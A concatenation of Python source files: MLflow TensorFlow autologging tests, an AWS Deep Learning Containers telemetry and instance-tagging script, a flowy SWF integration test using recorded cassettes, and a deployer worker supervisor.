tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
if positional:
model.fit_generator(generator(), 1, 10, 1, callbacks)
else:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1, callbacks=callbacks)
else:
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels, fit_variant
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(
generator(), epochs=10, steps_per_epoch=1, callbacks=[tensorboard_callback]
)
else:
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels, fit_variant
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, manual_run, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
Epoch indexing behavior is consistent across TensorFlow 2: tf.Keras uses
zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
This test verifies that metrics are produced for tf.Estimator training sessions
in the boundary casewhere a model is trained for a single epoch, ensuring that
we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE, EMBEDDING_DIM, name="embedding", mask_zero=True, input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
LooseVersion(tf.__version__) < LooseVersion("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
|
deep_learning_container.py
|
# Copyright 2018-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import json
import logging
import multiprocessing
import os
import re
import signal
import sys
import botocore.session
import requests
TIMEOUT_SECS = 5
def _validate_instance_id(instance_id):
"""
Validate instance ID
"""
instance_id_regex = r"^(i-\S{17})"
compiled_regex = re.compile(instance_id_regex)
match = compiled_regex.match(instance_id)
if not match:
return None
return match.group(1)
def _retrieve_instance_id():
"""
Retrieve instance ID from instance metadata service
"""
instance_id = None
url = "http://169.254.169.254/latest/meta-data/instance-id"
response = requests_helper(url, timeout=0.1)
if response is not None and not (400 <= response.status_code < 600):
instance_id = _validate_instance_id(response.text)
return instance_id
def _retrieve_instance_region():
"""
Retrieve instance region from instance metadata service
"""
region = None
valid_regions = [
"ap-northeast-1",
"ap-northeast-2",
"ap-southeast-1",
"ap-southeast-2",
"ap-south-1",
"ca-central-1",
"eu-central-1",
"eu-north-1",
"eu-west-1",
"eu-west-2",
"eu-west-3",
"sa-east-1",
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
]
url = "http://169.254.169.254/latest/dynamic/instance-identity/document"
response = requests_helper(url, timeout=0.1)
if response is not None and not (400 <= response.status_code < 600):
response_json = json.loads(response.text)
if response_json["region"] in valid_regions:
region = response_json["region"]
return region
def _retrieve_device():
return (
"gpu"
if os.path.isdir("/usr/local/cuda")
else "eia"
if os.path.isdir("/opt/ei_tools")
else "neuron"
if os.path.exists("/usr/local/bin/tensorflow_model_server_neuron")
else "cpu"
)
def _retrieve_cuda():
cuda_version = ""
try:
cuda_path = os.path.basename(os.readlink("/usr/local/cuda"))
cuda_version_search = re.search(r"\d+\.\d+", cuda_path)
cuda_version = "" if not cuda_version_search else cuda_version_search.group()
except Exception as e:
logging.error(f"Failed to get cuda path: {e}")
return cuda_version
def _retrieve_os():
version = ""
name = ""
with open("/etc/os-release", "r") as f:
for line in f.readlines():
if re.match(r"^ID=\w+$", line):
name = re.search(r"^ID=(\w+)$", line).group(1)
if re.match(r'^VERSION_ID="\d+\.\d+"$', line):
version = re.search(r'^VERSION_ID="(\d+\.\d+)"$', line).group(1)
return name + version
def requests_helper(url, timeout):
response = None
try:
response = requests.get(url, timeout=timeout)
except requests.exceptions.RequestException as e:
logging.error("Request exception: {}".format(e))
return response
def parse_args():
"""
Parsing function to parse input arguments.
Return: args, which containers parsed input arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"--framework", choices=["tensorflow", "mxnet", "pytorch"], help="framework of container image.", required=True
)
parser.add_argument("--framework-version", help="framework version of container image.", required=True)
parser.add_argument(
"--container-type",
choices=["training", "inference"],
help="What kind of jobs you want to run on container. Either training or inference.",
required=True,
)
args, _unknown = parser.parse_known_args()
fw_version_pattern = r"\d+(\.\d+){1,2}"
assert re.fullmatch(fw_version_pattern, args.framework_version), (
f"args.framework_version = {args.framework_version} does not match {fw_version_pattern}\n"
f"Please specify framework version as X.Y.Z or X.Y."
)
return args
def query_bucket():
"""
GET request on an empty object from an Amazon S3 bucket
"""
response = None
instance_id = _retrieve_instance_id()
region = _retrieve_instance_region()
args = parse_args()
framework, framework_version, container_type = args.framework, args.framework_version, args.container_type
py_version = sys.version.split(" ")[0]
if instance_id is not None and region is not None:
url = (
"https://aws-deep-learning-containers-{0}.s3.{0}.amazonaws.com"
"/dlc-containers-{1}.txt?x-instance-id={1}&x-framework={2}&x-framework_version={3}&x-py_version={4}&x-container_type={5}".format(
region, instance_id, framework, framework_version, py_version, container_type
)
)
response = requests_helper(url, timeout=0.2)
if os.environ.get("TEST_MODE") == str(1):
with open(os.path.join(os.sep, "tmp", "test_request.txt"), "w+") as rf:
rf.write(url)
logging.debug("Query bucket finished: {}".format(response))
return response
def tag_instance():
"""
Apply instance tag on the instance that is running the container using botocore
"""
instance_id = _retrieve_instance_id()
region = _retrieve_instance_region()
args = parse_args()
framework, framework_version, container_type = args.framework, args.framework_version, args.container_type
py_version = sys.version.split(" ")[0]
device = _retrieve_device()
cuda_version = f"_cuda{_retrieve_cuda()}" if device == "gpu" else ""
os_version = _retrieve_os()
tag = f"{framework}_{container_type}_{framework_version}_python{py_version}_{device}{cuda_version}_{os_version}"
tag_struct = {"Key": "aws-dlc-autogenerated-tag-do-not-delete", "Value": tag}
request_status = None
if instance_id and region:
try:
session = botocore.session.get_session()
ec2_client = session.create_client("ec2", region_name=region)
response = ec2_client.create_tags(Resources=[instance_id], Tags=[tag_struct])
request_status = response.get("ResponseMetadata").get("HTTPStatusCode")
if os.environ.get("TEST_MODE") == str(1):
with open(os.path.join(os.sep, "tmp", "test_tag_request.txt"), "w+") as rf:
rf.write(json.dumps(tag_struct, indent=4))
except Exception as e:
logging.error(f"Error. {e}")
logging.debug("Instance tagged successfully: {}".format(request_status))
else:
logging.error("Failed to retrieve instance_id or region")
return request_status
def main():
"""
Invoke bucket query
"""
# Logs are not necessary for normal run. Remove this line while debugging.
logging.getLogger().disabled = True
logging.basicConfig(level=logging.ERROR)
bucket_process = multiprocessing.Process(target=query_bucket)
tag_process = multiprocessing.Process(target=tag_instance)
bucket_process.start()
tag_process.start()
tag_process.join(TIMEOUT_SECS)
bucket_process.join(TIMEOUT_SECS)
if tag_process.is_alive():
os.kill(tag_process.pid, signal.SIGKILL)
tag_process.join()
if bucket_process.is_alive():
os.kill(bucket_process.pid, signal.SIGKILL)
bucket_process.join()
if __name__ == "__main__":
main()
|
test_swf_integration.py
|
from __future__ import print_function
import os
import sys
import multiprocessing
import time
import json
import uuid
import functools
import gzip
import vcr
import vcr.cassette
import vcr.errors
import vcr.serialize
import vcr.request
from flowy import restart
from flowy import wait
from flowy import TaskError
from flowy import SWFActivityConfig
from flowy import SWFActivityWorker
from flowy import SWFClient
from flowy import SWFWorkflowConfig
from flowy import SWFWorkflowStarter
from flowy import SWFWorkflowWorker
VERSION = 2
HERE = os.path.dirname(os.path.realpath(__file__))
A_CASSETTE = os.path.join(HERE, 'cassettes/a.yml.gz')
W_CASSETTE = os.path.join(HERE, 'cassettes/w.yml.gz')
DOMAIN = 'FlowyIntegrationTest' # a domain where you have access
TASKLIST = 'tl'
IDENTITY = 'test'
RECORDING = False
exit_event = multiprocessing.Event()
wf_finished_event = multiprocessing.Event()
# Patch vcr to use gzip files
def load_cassette(cassette_path, serializer):
f = gzip.open(cassette_path, 'rb')
cassette_content = f.read()
cassette = vcr.serialize.deserialize(cassette_content, serializer)
f.close()
return cassette
def save_cassette(cassette_path, cassette_dict, serializer):
data = vcr.serialize.serialize(cassette_dict, serializer)
dirname, _ = os.path.split(cassette_path)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
f = gzip.open(cassette_path, 'wb')
f.write(data)
f.close()
vcr.cassette.load_cassette = load_cassette
vcr.cassette.save_cassette = save_cassette
# Patch requests_match in cassette for speed-up
def requests_match(r1, r2, matchers):
"""Skip logging and speed-up maching."""
return all(m(r1, r2) for m in matchers)
vcr.cassette.requests_match = requests_match
# Patch urpalse to speed-up for python3
try:
from functools import lru_cache
from urllib.parse import urlparse
vcr.request.urlparse = lru_cache(maxsize=None)(urlparse)
except ImportError:
pass
# patch uuid4 for consistent keys
def fake_uuid4():
x = 0
while 1:
yield 'fakeuuid-%s-' % x
x += 1
uuid.uuid4 = functools.partial(next, fake_uuid4())
def break_loop(self):
return exit_event.is_set()
class TestSWFWorkflowWorker(SWFWorkflowWorker):
break_loop = break_loop
class TestSWFActivityWorker(SWFActivityWorker):
break_loop = break_loop
class BaseWorkflow(object):
def __call__(self, *args, **kwargs):
r = self.call(*args, **kwargs)
wait(r)
wf_finished_event.set()
return r
def call(self, *args, **kwargs):
raise NotImplementedError
a_conf = SWFActivityConfig(default_task_list=TASKLIST,
default_schedule_to_start=30,
default_schedule_to_close=60,
default_start_to_close=15,
default_heartbeat=10)
@a_conf(version=VERSION)
def tactivity(hb, a=None, b=None, sleep=None, heartbeat=False, err=None):
result = None
if a is not None and b is not None:
result = a + b
elif a is not None:
result = a * a
if sleep is not None and RECORDING:
time.sleep(sleep)
if heartbeat:
hb()
if err is not None:
raise RuntimeError(err)
return result
empty_conf = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=20,
default_child_policy='TERMINATE', )
empty_conf.conf_activity('activity', VERSION, 'tactivity')
@empty_conf(version=VERSION)
class TWorkflow(object):
def __init__(self, activity):
pass
def __call__(self, a=None, b=None, sleep=None, heartbeat=False, err=None):
dummy_heartbeat = lambda: True
return tactivity(dummy_heartbeat, a, b, sleep, heartbeat, err)
conf_use_activities = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=60,
default_child_policy='TERMINATE')
conf_use_activities.conf_activity('task', VERSION, 'tactivity')
conf_use_activities.conf_activity('short_task', VERSION, 'tactivity',
schedule_to_close=1,
retry=(0, ))
conf_use_activities.conf_activity('delayed_task', VERSION, 'tactivity',
retry=(3, ))
conf_use_activities.conf_activity('non_existing_task', 1, 'xxx')
conf_use_workflow = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=60,
default_child_policy='TERMINATE')
conf_use_workflow.conf_workflow('task', VERSION, 'TWorkflow')
conf_use_workflow.conf_workflow('short_task', VERSION, 'TWorkflow',
workflow_duration=1,
retry=(0, ))
conf_use_workflow.conf_workflow('delayed_task', VERSION, 'TWorkflow',
retry=(3, ))
conf_use_workflow.conf_workflow('non_existing_task', 1, 'xxx')
@conf_use_activities(version=VERSION)
@conf_use_workflow(version=VERSION, name='TestWorkflowW')
class TestWorkflow(BaseWorkflow):
def __init__(self, task, short_task, delayed_task, non_existing_task):
self.task = task
self.short_task = short_task
self.delayed_task = delayed_task
self.non_existing_task = non_existing_task
def call(self):
tasks = [self.task(10),
self.task(err=u'Error!'),
self.task(heartbeat=True),
self.short_task(sleep=3),
self.delayed_task(20),
self.non_existing_task(), ]
last = self.task(1, 1) # Make the history longer, to have pages
for _ in range(20):
last = self.task(last, 1)
tasks.append(last)
for t in tasks:
try:
wait(t)
except TaskError:
pass
@empty_conf(version=VERSION)
class RestartWorkflow(BaseWorkflow):
def __init__(self, activity):
pass
def call(self, should_restart=True):
if should_restart:
return restart(should_restart=False)
return 1
@empty_conf(version=VERSION)
class ExitWorkflow(object):
def __init__(self, activity):
exit_event.set()
wait(activity()) # wake the activity thread
def __call__(self):
pass
wworker = TestSWFWorkflowWorker()
wworker.scan(package=sys.modules[__name__])
aworker = TestSWFActivityWorker()
aworker.scan(package=sys.modules[__name__])
body_cache = {}
def body_as_dict(r1, r2):
if r1 not in body_cache:
r1b = r1.body if isinstance(r1.body, str) else r1.body.decode('utf-8')
body_cache[r1] = json.loads(r1b)
if r2 not in body_cache:
r2b = r2.body if isinstance(r2.body, str) else r2.body.decode('utf-8')
body_cache[r2] = json.loads(r2b)
return body_cache[r1] == body_cache[r2]
def escaped_headers(r1, r2):
import urllib
r1h = dict((h, urllib.unquote(v)) for h, v in r1.headers.items())
r2h = dict((h, urllib.unquote(v)) for h, v in r1.headers.items())
return r1 == r2
vcr.default_vcr.register_matcher('dict_body', body_as_dict)
vcr.default_vcr.register_matcher('esc_headers', body_as_dict)
cassette_args = {
'match_on': ['dict_body', 'esc_headers', 'query', 'method', 'uri', 'host',
'port', 'path'],
'filter_headers': ['authorization', 'x-amz-date', 'content-length',
'user-agent']
}
def test_activity_integration():
with vcr.use_cassette(A_CASSETTE,
record_mode='none', **cassette_args) as cass:
try:
cl = SWFClient(kwargs={'aws_access_key_id': 'x',
'aws_secret_access_key': 'x',
'region_name': 'us-east-1'})
aworker.run_forever(DOMAIN, TASKLIST,
identity=IDENTITY,
swf_client=cl,
setup_log=False)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
assert cass.all_played
def test_workflow_integration():
with vcr.use_cassette(W_CASSETTE,
record_mode='none', **cassette_args) as cass:
try:
cl = SWFClient(kwargs={'aws_access_key_id': 'x',
'aws_secret_access_key': 'x',
'region_name': 'us-east-1'})
wworker.run_forever(DOMAIN, TASKLIST,
identity=IDENTITY,
swf_client=cl,
setup_log=False)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
assert cass.all_played
def start_activity_worker():
with vcr.use_cassette(A_CASSETTE,
record_mode='all', **cassette_args) as cass:
try:
aworker.run_forever(DOMAIN, TASKLIST, identity=IDENTITY)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
def start_workflow_worker():
with vcr.use_cassette(W_CASSETTE,
record_mode='all', **cassette_args) as cass:
try:
wworker.run_forever(DOMAIN, TASKLIST, identity=IDENTITY)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
if __name__ == '__main__':
RECORDING = True
try:
os.remove(A_CASSETTE)
except:
pass
try:
os.remove(W_CASSETTE)
except:
pass
a_worker = multiprocessing.Process(target=start_activity_worker)
w_worker = multiprocessing.Process(target=start_workflow_worker)
a_worker.start()
w_worker.start()
time.sleep(5) # Wait for registration
wfs = ['TestWorkflow', 'TestWorkflowW', 'RestartWorkflow']
for wf in wfs:
print('Starting', wf)
SWFWorkflowStarter(DOMAIN, wf, VERSION)()
wf_finished_event.wait()
wf_finished_event.clear()
# Must be the last one
print('Prepare to exit')
SWFWorkflowStarter(DOMAIN, 'ExitWorkflow', VERSION)()
a_worker.join()
w_worker.join()
|
supervisor.py
|
# Copyright (C) 2016 Nokia Corporation and/or its subsidiary(-ies).
import ConfigParser
from functools import wraps
import importlib
from logging import getLogger
import os
import threading
import time
import beanstalkc
from . import api
from . import execution, mail, notification, websocket, database
from .instancehealth import InstanceHealth
from .log import configure_logging
from .checkreleases import CheckReleasesWorker
from .cleaner import CleanerWorker
from .worker import DeployerWorker, AsyncFetchWorker
from .inventory import InventoryUpdateChecker, AsyncInventoryWorker
logger = getLogger(__name__)
def _import_class(class_path):
parts = class_path.split(".")
module = importlib.import_module(".".join(parts[:-1]))
return getattr(module, parts[-1])
class WorkerSupervisor(object):
"""Spawns and manages all the deployer workers.
A worker is a class with the following interface:
* the `start` method must be a blocking method, and will be called in a new thread.
If this method exits by raising an exception, it will be called again.
* the `stop` method can be called from any thread and must cause the `start` method to return.
* the `name` property describes the worker
"""
# Main entry point for the deployer
def __init__(self, config_path):
self.threads = []
self._health = InstanceHealth()
self._running = True
self.lock = threading.Lock()
configure_logging()
logger.info("Using configuration file at {}".format(config_path))
if not os.path.isfile(config_path):
raise ValueError("Can not read the configuration file at {}".format(config_path))
config = ConfigParser.ConfigParser()
config.read(config_path)
self.config_path = config_path
database.init_db(config.get("database", "connection"))
workers = self._build_workers(config)
self._spawn_workers(workers)
t = threading.Thread(name="supervisor", target=self._monitor)
t.daemon = True # we can forcefully kill this thread
t.start()
def _restart_function_on_exception(self, f, context):
"""If the callable f raises an exception, log the exception then call f again.
This function will not propagate exceptions, and will return only when f returns without raising
an exception.
This is useful to ensure that a worker thread does not die.
The function will not be called again is the deployer is exiting.
Args:
f (callable)
context (str): will be displayed in log messages if an exception occurs
"""
@wraps(f)
def wrapped(*args, **kwargs):
while self._running:
try:
out = f(*args, **kwargs)
if self._running:
logger.error("A worker main function returned while the deployer is still running, "
"this is a bug ({}).".format(context))
return out
except Exception:
logger.exception("Unhandled exception ({}), will restart the worker.".format(context))
time.sleep(30)
return wrapped
def _build_notifiers(self, ws_worker, mail_sender, notify_mails, carbon_host, carbon_port, other_deployer_urls, deployer_username, deployer_token, provider):
mail = notification.MailNotifier(mail_sender, notify_mails)
websocket = notification.WebSocketNotifier(ws_worker)
graphite = notification.GraphiteNotifier(carbon_host, carbon_port)
remote = notification.RemoteDeployerNotifier(other_deployer_urls, deployer_username, deployer_token)
more_notifiers = provider.build_notifiers()
return notification.NotifierCollection(mail, websocket, graphite, remote, *more_notifiers), websocket
def _build_integration_module(self, config):
provider_class = _import_class(config.get('integration', 'provider'))
return provider_class(config)
def _build_workers(self, config):
provider = self._build_integration_module(config)
workers = []
general_config = execution.GeneralConfig(
base_repos_path=config.get("general", "local_repo_path"),
haproxy_user=config.get("general", "haproxy_user"),
haproxy_password=config.get("general", "haproxy_pass"),
notify_mails=config.get('general', "notify_mails").split(","),
mail_sender=config.get('mail', 'sender')
)
notify_mails = [s.strip() for s in config.get('general', 'notify_mails').split(",")]
carbon_host = config.get('general', 'carbon_host')
carbon_port = config.getint('general', 'carbon_port')
deployers_urls = [s.strip() for s in config.get('cluster', 'deployers_urls').split(",")]
other_deployers_urls = list(deployers_urls)
other_deployers_urls.remove(config.get('cluster', 'this_deployer_url'))
deployer_username = config.get('cluster', 'this_deployer_username')
deployer_token = config.get('cluster', 'this_deployer_token')
mail_sender = config.get('mail', 'sender')
ws_worker = websocket.WebSocketWorker(port=config.getint('general', 'websocket_port'))
workers.append(ws_worker)
self.notifier, websocket_notifier = self._build_notifiers(
ws_worker, mail_sender, notify_mails, carbon_host, carbon_port, other_deployers_urls, deployer_username, deployer_token, provider
)
for i in range(5):
conn = beanstalkc.Connection(host=config.get('general', 'beanstalk_host'), port=11300)
deployer_worker = DeployerWorker(conn, general_config, self.notifier, provider.detect_artifact, str(i))
workers.append(deployer_worker)
mail_worker = mail.MailWorker(config.get("mail", "mta"))
workers.append(mail_worker)
# START FEATURE FLAG: inventory
self.inventory_host = None
self.inventory_auth = None
if config.has_section('inventory') and config.getboolean('inventory', 'activate_updater') is True:
self.inventory_host = provider.inventory_host()
if config.getboolean('inventory', 'activate_checker'):
if config.has_option('inventory', 'update_frequency'):
inventory_frequency = config.getint('inventory', 'update_frequency')
else:
inventory_frequency = 60
inventory_update_checker = InventoryUpdateChecker(self.inventory_host, inventory_frequency)
workers.append(inventory_update_checker)
async_inv_updater = AsyncInventoryWorker(self.inventory_host)
workers.append(async_inv_updater)
self.inventory_auth = provider.inventory_authenticator()
# END FEATURE FLAG
api_worker = api.ApiWorker(self.config_path, config, self.notifier, websocket_notifier, provider.authenticator(), self._health, self.inventory_auth, self.inventory_host)
workers.append(api_worker)
if config.has_option("general", "check_releases_frequency"):
frequency = config.getint("general", "check_releases_frequency")
if frequency > 0:
ignore_envs = config.get("general", "check_releases_ignore_environments").split(",") if config.has_option("general", "check_releases_ignore_environments") else []
check_releases_workers = CheckReleasesWorker(frequency, ignore_envs, self._health)
workers.append(check_releases_workers)
async_fetch_workers = [
AsyncFetchWorker(
config,
self.notifier,
"async-fetch-worker-{}".format(id_worker))
for id_worker in range(1, 4)
]
for worker in async_fetch_workers:
workers.append(worker)
workers.append(CleanerWorker(general_config.base_repos_path))
return workers
def run(self):
"""Blocks until exit() is called (from another thread)"""
try:
while self._running:
time.sleep(1)
finally:
self._exit()
def _spawn_workers(self, workers):
for w in workers:
self._start_worker(w)
